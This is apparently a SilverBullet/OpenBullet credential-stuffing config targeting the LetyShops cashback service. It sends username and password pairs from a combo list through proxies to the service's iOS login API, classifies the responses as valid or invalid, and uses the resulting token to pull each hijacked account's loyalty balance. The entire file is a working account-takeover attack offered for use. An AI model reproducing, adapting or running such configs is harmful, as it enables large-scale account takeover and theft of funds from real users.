[SETTINGS]
{
  "Name": "letyshop iosapi",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-20T19:27:46.9378597+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "letyshop iosapi",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://auth.letyshops.com/v1/login" 
  CONTENT "data%5Bclient_id%5D=5370655661&data%5Busername%5D=<USER>&data%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Host: auth.letyshops.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "User-Agent: letyshops%20-%20release/2.0.21 CFNetwork/1240.0.4 Darwin/20.6.0" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "Content-Length: 96" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Authorization: " 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "400" 
    KEY "username is invalid" 
    KEY "Error login or password" 
  KEYCHAIN Success OR 
    KEY "200" 
    KEY "\"status\":\"OK\"," 
  KEYCHAIN Retry OR 
    KEY "403" 
    KEY "Too many request" 

#tk PARSE "<SOURCE>" JSON "access_token" -> VAR "tk" 

#CAP REQUEST GET "https://api.letyshops.com/v1/me/loyalty" 
  
  HEADER "Host: api.letyshops.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: letyshops%20-%20release/2.0.21 CFNetwork/1240.0.4 Darwin/20.6.0" 
  HEADER "Accept-Language: en-us" 
  HEADER "Authorization: Bearer <tk>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#currency PARSE "<SOURCE>" JSON "currency" CreateEmpty=FALSE -> CAP "currency" 

#overall PARSE "<SOURCE>" JSON "overall" CreateEmpty=FALSE -> CAP "balance" 

#pending PARSE "<SOURCE>" JSON "pending" CreateEmpty=FALSE -> CAP "pending" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<balance>" EqualTo "0.00" 
    KEY "<balance>" Contains "0.00" 
  KEYCHAIN Success OR 
    KEY "<balance>" DoesNotContain "0.00" 
    KEY "<balance>" NotEqualTo "0.00" 

#author FUNCTION Constant "@uzzzzul" -> CAP "configby" 

